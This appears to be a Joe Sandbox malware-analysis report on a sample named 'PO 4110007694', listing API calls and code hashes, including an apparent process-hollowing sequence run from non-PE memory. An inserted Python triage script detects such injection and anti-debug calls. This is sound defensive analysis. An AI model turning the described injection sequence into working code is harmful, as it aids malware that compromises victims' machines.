                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C30791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C307B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Name$Path$FileFullLongOpen_memset
                                                                    • String ID: X
                                                                    • API String ID: 3777226403-3081909835
                                                                    APIs
                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00C798F8
                                                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C7990F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Temp$FileNamePath
                                                                    • String ID: aut
                                                                    • API String ID: 3285503233-3010740371
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    APIs
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C30193
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000010,00000000), ref: 00C3019B
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C301A6
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C301B1
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000011,00000000), ref: 00C301B9
                                                                      • Part of subcall function 00C30162: MapVirtualKeyW.USER32(00000012,00000000), ref: 00C301C1
                                                                      • Part of subcall function 00C260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C1F930), ref: 00C26154
                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C1F9CD
                                                                    • OleInitialize.OLE32(00000000), ref: 00C1FA4A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00C545C8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                    • String ID:
                                                                    • API String ID: 1986988660-0
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00C14370
                                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C14415
                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C14432
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: IconNotifyShell_$_memset
                                                                    • String ID:
                                                                    • API String ID: 1505330794-0
                                                                    APIs
                                                                    • __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A192
                                                                      • Part of subcall function 00C3A16B: __NMSG_WRITE.LIBCMT ref: 00C3A19C
                                                                    • __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3A1C8: GetModuleFileNameW.KERNEL32(00000000,00CD33BA,00000104,?,00000001,00000000), ref: 00C3A25A
                                                                      • Part of subcall function 00C3A1C8: ___crtMessageBoxW.LIBCMT ref: 00C3A308
                                                                      • Part of subcall function 00C3309F: ___crtCorExitProcess.LIBCMT ref: 00C330A5
                                                                      • Part of subcall function 00C3309F: ExitProcess.KERNEL32 ref: 00C330AE
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1372826849-0
                                                                    APIs
                                                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00C79548,?,?,?,?,?,00000004), ref: 00C798BB
                                                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00C798D1
                                                                    • CloseHandle.KERNEL32(00000000,?,00C79548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00C798D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseCreateHandleTime
                                                                    • String ID:
                                                                    • API String ID: 3397143404-0
                                                                    • Opcode ID: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                    • Instruction ID: c6511e26d66413eac8e88f0dc0515691432723c2121723d1aaee7c11e8d0a832
                                                                    • Opcode Fuzzy Hash: b04d17592822e8ceb639015ba5c78fa17fbb363b0c94f404b61fed70e36f918d
                                                                    • Instruction Fuzzy Hash: 9CE08632140214B7EB211B64EC0EFDE7B19EB06760F108125FB24A90F087B1562297D8
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00C78D1B
                                                                      • Part of subcall function 00C32D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00C39A24), ref: 00C32D69
                                                                      • Part of subcall function 00C32D55: GetLastError.KERNEL32(00000000,?,00C39A24), ref: 00C32D7B
                                                                    • _free.LIBCMT ref: 00C78D2C
                                                                    • _free.LIBCMT ref: 00C78D3E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction ID: c633dbf315a95d57c0d43ffc37f79d539e478ce928b7708461c737af82590984
                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                    • Instruction Fuzzy Hash: 9CE012B165160246CF34A678AD48A9313DC4F68352B24491DB62DD7186DF64F946D124
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CALL
                                                                    • API String ID: 0-4196123274
                                                                    • Opcode ID: e86a1ab2cad60d705efbd3434238ad8616a8604d6cd202e3c1c17213daba45c4
                                                                    • Instruction ID: 12685adb9c783136b3a7e84846a99a60ef1b58e02ab48d23f91a37738fe2de23
                                                                    • Opcode Fuzzy Hash: e86a1ab2cad60d705efbd3434238ad8616a8604d6cd202e3c1c17213daba45c4
                                                                    • Instruction Fuzzy Hash: C6224974509201DFC724DF14C494BAABBE1FF86314F14896DE89A8B361D731ED85EB82
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID: EA06
                                                                    • API String ID: 4104443479-3962188686
                                                                    • Opcode ID: 585617cc813441ffd31bea4c1c30f195047962205ab1aa00bda48f25686db5e8
                                                                    • Instruction ID: 9437a3ad685653456a2aacd7b9f928fd3cf1713ff8512d5ad18d5ee36132186c
                                                                    • Opcode Fuzzy Hash: 585617cc813441ffd31bea4c1c30f195047962205ab1aa00bda48f25686db5e8
                                                                    • Instruction Fuzzy Hash: B6414F71A0415857DF196B64E861BFE7FA29F47300F684475EC829B282D6309EC5B3A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                    • Instruction ID: 78a7a8686e94218b6a9c7aa40a52122ad0b49b5075774356b121f27de1fd6ffd
                                                                    • Opcode Fuzzy Hash: 80b40dc59eff670f7c44fd7edcc2cf2316980d5bc59dda85bf8bc9441f819d6d
                                                                    • Instruction Fuzzy Hash: FC3187B2604506AFC704DF69C8D1DA9B3B9FF49310B158729E529CB291EB30E950EB90
                                                                    APIs
                                                                    • IsThemeActive.UXTHEME ref: 00C14834
                                                                      • Part of subcall function 00C3336C: __lock.LIBCMT ref: 00C33372
                                                                      • Part of subcall function 00C3336C: DecodePointer.KERNEL32(00000001,?,00C14849,00C67C74), ref: 00C3337E
                                                                      • Part of subcall function 00C3336C: EncodePointer.KERNEL32(?,?,00C14849,00C67C74), ref: 00C33389
                                                                      • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00C14915
                                                                      • Part of subcall function 00C148FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C1492A
                                                                      • Part of subcall function 00C13B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00C13B68
                                                                      • Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
                                                                      • Part of subcall function 00C13B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00CD52F8,00CD52E0,?,?), ref: 00C13BEB
                                                                      • Part of subcall function 00C13B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00C13C6F
                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C14874
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                    • String ID:
                                                                    • API String ID: 1438897964-0
                                                                    • Opcode ID: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                    • Instruction ID: 50aaf9b64047f2b17b82387c88f5aeb18ec357ad2c701ffd3c16336f1a695e0d
                                                                    • Opcode Fuzzy Hash: a1fae390ba68466046658ee00300ae0af7375f70caf63a05e6591be656431c03
                                                                    • Instruction Fuzzy Hash: E5119D719093419FD700EF69D845B4EBBE8EF8A750F10891FF040872B1DB70968ADB92
                                                                    APIs
                                                                      • Part of subcall function 00C3571C: __FF_MSGBANNER.LIBCMT ref: 00C35733
                                                                      • Part of subcall function 00C3571C: __NMSG_WRITE.LIBCMT ref: 00C3573A
                                                                      • Part of subcall function 00C3571C: RtlAllocateHeap.NTDLL(017A0000,00000000,00000001,00000000,?,?,?,00C30DD3,?), ref: 00C3575F
                                                                    • std::exception::exception.LIBCMT ref: 00C30DEC
                                                                    • __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                      • Part of subcall function 00C3859B: RaiseException.KERNEL32(?,?,?,00CC9E78,00000000,?,?,?,?,00C30E06,?,00CC9E78,?,00000001), ref: 00C385F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 3902256705-0
                                                                    • Opcode ID: e16ff6c3886353847f4bfe7e615d01b7e3f3d99350c26481cd71e8355b490bf3
                                                                    • Instruction ID: 58913e5cdad045ee2690a6c7b28b59a44554e83ceaaf1812a037b95aeee50770
                                                                    • Opcode Fuzzy Hash: e16ff6c3886353847f4bfe7e615d01b7e3f3d99350c26481cd71e8355b490bf3
                                                                    • Instruction Fuzzy Hash: 0EF0F47292032A66CB10BAD8EC21ADE77AC9F01310F200429F814A6982DF709A44E6D1
                                                                    APIs
                                                                      • Part of subcall function 00C38B28: __getptd_noexit.LIBCMT ref: 00C38B28
                                                                    • __lock_file.LIBCMT ref: 00C353EB
                                                                      • Part of subcall function 00C36C11: __lock.LIBCMT ref: 00C36C34
                                                                    • __fclose_nolock.LIBCMT ref: 00C353F6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                    • String ID:
                                                                    • API String ID: 2800547568-0
                                                                    • Opcode ID: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                    • Instruction ID: 3960019e39b15c06c909e5a40bec9fb2e2d3d14fb83b3d86562c25202ba2d5a9
                                                                    • Opcode Fuzzy Hash: e2ec56a3f680ba84f0757a486652d14061a503e910bb40155efdb5ace79bc0ab
                                                                    • Instruction Fuzzy Hash: 8CF0B471921B059ADB51BF7598067AD7BE06F41374F218208F424AB1D1CFFC8A45BB92
                                                                    APIs
                                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017E07E1
                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017E0803
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                    • String ID:
                                                                    • API String ID: 2438371351-0
                                                                    • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction ID: b19c9788d8a3728b77f3af3be87db937148144e4dcf650442080c81684990c0e
                                                                    • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                    • Instruction Fuzzy Hash: 2212EE20E14658C6EB24DF64D8547DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
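The entry above is the one a triage analyst wants to surface first in a report of this size: CreateProcessW, Wow64GetThreadContext and ReadProcessMemory called in sequence from a memory region that is not backed by a PE image (Offset 017DE000, "based on PE: false"), which is the classic shape of a process-hollowing style injection stage. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" and "Memory Dump Source" lines in the layout used on this page and flags functions that combine process-injection primitives, call anti-debug APIs, or issue API calls from non-PE-backed memory. The sample text is constructed from entries of the kind shown here, and the API groupings and the scoring rule (two or more primitive groups in one function) are assumptions of the example, not rules from the report.

```python
"""Triage helper for Joe Sandbox function entries (added example, not report tooling)."""
import re
from dataclasses import dataclass, field

# One API line: optional "Part of subcall function X: " prefix, Api.MODULE, optional
# "(args)", then "ref: ADDR". Matches forms such as
#   • CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
#   • _free.LIBCMT ref: 00C78D1B
#   • Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
API_RE = re.compile(
    r"•\s+(?:Part of subcall function (?P<sub>[0-9A-F]+): )?"
    r"(?P<api>[\w@:]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]+)"
)
SRC_RE = re.compile(
    r"Source File: (?P<file>\S+), Offset: (?P<off>[0-9A-F]+), based on PE: (?P<pe>true|false)"
)

# Assumed groupings: a function that hits two or more groups directly is treated as
# carrying injection primitives. Adjust to taste; these are not Joe Sandbox's rules.
INJECTION = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "SetThreadContext",
                "Wow64GetThreadContext", "Wow64SetThreadContext"},
    "memory":  {"ReadProcessMemory", "WriteProcessMemory", "NtWriteVirtualMemory",
                "VirtualAllocEx", "NtUnmapViewOfSection"},
    "resume":  {"ResumeThread", "NtResumeThread", "QueueUserAPC"},
}
ANTI_DEBUG = {"IsDebuggerPresent", "CheckRemoteDebuggerPresent",
              "OutputDebugStringW", "OutputDebugStringA", "NtQueryInformationProcess"}


@dataclass
class Entry:
    calls: list = field(default_factory=list)  # (api, module, ref, from_subcall)
    offset: str = ""
    pe_backed: bool = True


def parse_entries(text):
    """Split report text into one Entry per 'APIs' section."""
    entries, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = Entry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.search(s)
        if m:
            cur.calls.append((m["api"], m["mod"], m["ref"], m["sub"] is not None))
            continue
        m = SRC_RE.search(s)
        if m:
            cur.offset = m["off"]
            cur.pe_backed = (m["pe"] == "true")
    return entries


def triage(entries):
    """Return a list of findings, one dict per entry that trips a rule."""
    findings = []
    for idx, e in enumerate(entries):
        direct = {api for api, _, _, sub in e.calls if not sub}
        every = {api for api, _, _, _ in e.calls}
        hit = {group for group, apis in INJECTION.items() if direct & apis}
        reasons = []
        if len(hit) >= 2:
            reasons.append("process-injection primitives: " + ", ".join(sorted(hit)))
        if every & ANTI_DEBUG:
            reasons.append("anti-debug: " + ", ".join(sorted(every & ANTI_DEBUG)))
        if not e.pe_backed and direct:
            reasons.append(f"API calls from non-PE-backed memory at {e.offset}")
        if reasons:
            findings.append({"entry": idx, "offset": e.offset, "reasons": reasons})
    return findings


# Constructed sample modelled on the report layout (not copied from a live report).
SAMPLE = """\
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000), ref: 00C798BB
• SetFileTime.KERNELBASE(00000000,?,00000000,?), ref: 00C798D1
• CloseHandle.KERNEL32(00000000,?,00C79548), ref: 00C798D8
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 017E074B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 017E07E1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 017E0803
Memory Dump Source
• Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
APIs
  • Part of subcall function 00C13B3A: IsDebuggerPresent.KERNEL32 ref: 00C13B7A
• SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00C14874
Memory Dump Source
• Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
"""

if __name__ == "__main__":
    for f in triage(parse_entries(SAMPLE)):
        print(f"entry {f['entry']} @ {f['offset']}: " + "; ".join(f["reasons"]))
```

Calls reached only through "Part of subcall function" lines are kept out of the injection score on purpose: they belong to a callee that is listed elsewhere, and counting them would flag every caller of a helper. They still count for the anti-debug rule, since a debugger check is interesting wherever it sits in the call tree. Run the script against the saved text of a report to get a short list of function entries to open first in the IDA snapshot.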
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 544645111-0
                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction ID: c9e434a9bf51fce6fca1837675821fd9ad70eb7ab6121c14a4a02ea16ed68fd2
                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                    • Instruction Fuzzy Hash: D631F572A101059BC718DF49E4A4A69F7A6FB49300F3497A5E81ACB351D731EEC1DBC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ClearVariant
                                                                    • String ID:
                                                                    • API String ID: 1473721057-0
                                                                    • Opcode ID: 32654e8e223ec2b0fc40754f7234f47fe5e642f72a0e0da4af635a0c006f1ab9
                                                                    • Instruction ID: dc6bedd5eeeed327161b760885b9beaee7be345db65bb8d4f4cec627542c005f
                                                                    • Opcode Fuzzy Hash: 32654e8e223ec2b0fc40754f7234f47fe5e642f72a0e0da4af635a0c006f1ab9
                                                                    • Instruction Fuzzy Hash: 134138746043519FDB14DF14C458B5ABBE1BF45318F1988ACE8998B362C332ED86DF52
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 5ba47d0481b39388d5f2befa68b63e57e09a831b645a1747ed48a723a150ccaf
                                                                    • Instruction ID: 358ae06971d4c72ee0d32267ea9b702c7b51af7787f5507977f986c9fa0821e0
                                                                    • Opcode Fuzzy Hash: 5ba47d0481b39388d5f2befa68b63e57e09a831b645a1747ed48a723a150ccaf
                                                                    • Instruction Fuzzy Hash: F5213A72A08A09EBDB148F56EC81BAD7BB4FF14351F32856DE886C5190EB30D5D0E745
APIs
  • Part of subcall function 00C14BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00C14BEF
  • Part of subcall function 00C3525B: __wfsopen.LIBCMT ref: 00C35266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00CD52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00C14E0F
